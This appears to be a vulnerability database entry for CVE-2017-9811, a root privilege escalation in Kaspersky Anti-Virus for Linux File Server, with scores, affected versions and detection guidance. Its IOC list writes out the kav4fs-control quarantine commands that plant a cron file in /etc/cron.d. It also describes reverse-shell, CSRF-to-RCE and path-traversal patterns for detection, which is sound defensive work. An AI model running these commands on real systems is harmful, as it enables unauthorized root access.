cbcvebase.
CVE-2017-9811
published 2017-07-17

CVE-2017-9811: The kluser is able to interact with the kav4fs-control binary in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version…

PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
10.47%
95.2th percentile
The kluser is able to interact with the kav4fs-control binary in Kaspersky Anti-Virus for Linux File Server before Maintenance Pack 2 Critical Fix 4 (version 8.0.4.312). By abusing the quarantine read and write operations, it is possible to elevate the privileges to root.

Affected

1 ranges
VendorProductVersion rangeFixed in
kasperskyanti-virus_for_linux_server<= 8.0.3.297

Detection & IOCsextracted from sources · hover to see the quote

path/opt/kaspersky/kav4fs/bin/kav4fs-control
path/etc/cron.d/implant
path/tmp/badcron
path/tmp/reverse.sh
command/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --add-object /tmp/badcron
command/opt/kaspersky/kav4fs/bin/kav4fs-control -Q --restore $QUARANTINE_ID --file /etc/cron.d/implant
path/tmp/pepperoni
  • Monitor for kav4fs-control being invoked with quarantine flags (-Q --add-object, -Q --restore) by the kluser account, especially when the restore target is a privileged path such as /etc/cron.d/
  • Alert on POST requests to /cgi-bin/cgictl?action=setTaskSettings containing a 'Command' key in the settings parameter, indicating CSRF-driven RCE via notification action configuration
  • Detect path traversal attempts against /cgi-bin/cgictl?action=getReportStatus where the reportId parameter contains URL-encoded dot-dot sequences (%2f..%2f) and a null byte (%00)
  • Watch for new files created under /etc/cron.d/ by non-root processes or by kav4fs-control, which is the privilege escalation persistence mechanism
  • Detect outbound bash reverse shell connections from the Kaspersky AV process or kluser context using /dev/tcp to external hosts on non-standard ports
  • Flag XSS probes against the scriptName parameter of the licenseKeyInfo action on port 9080
  • ·The PoC IP address 172.16.76.1 and port 8000 are attacker-controlled lab values from the proof-of-concept and should not be treated as fixed attacker infrastructure; real-world exploitation will use different callback addresses
  • ·The wmc_sid cookie value in the PoC request is a session token from the researcher's test environment and is not a stable IOC; focus on the request structure and endpoint rather than the session value
  • ·Only Kaspersky Anti-Virus for Linux File Server 8.0.3.297 was explicitly tested; other versions may also be affected but were not confirmed

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.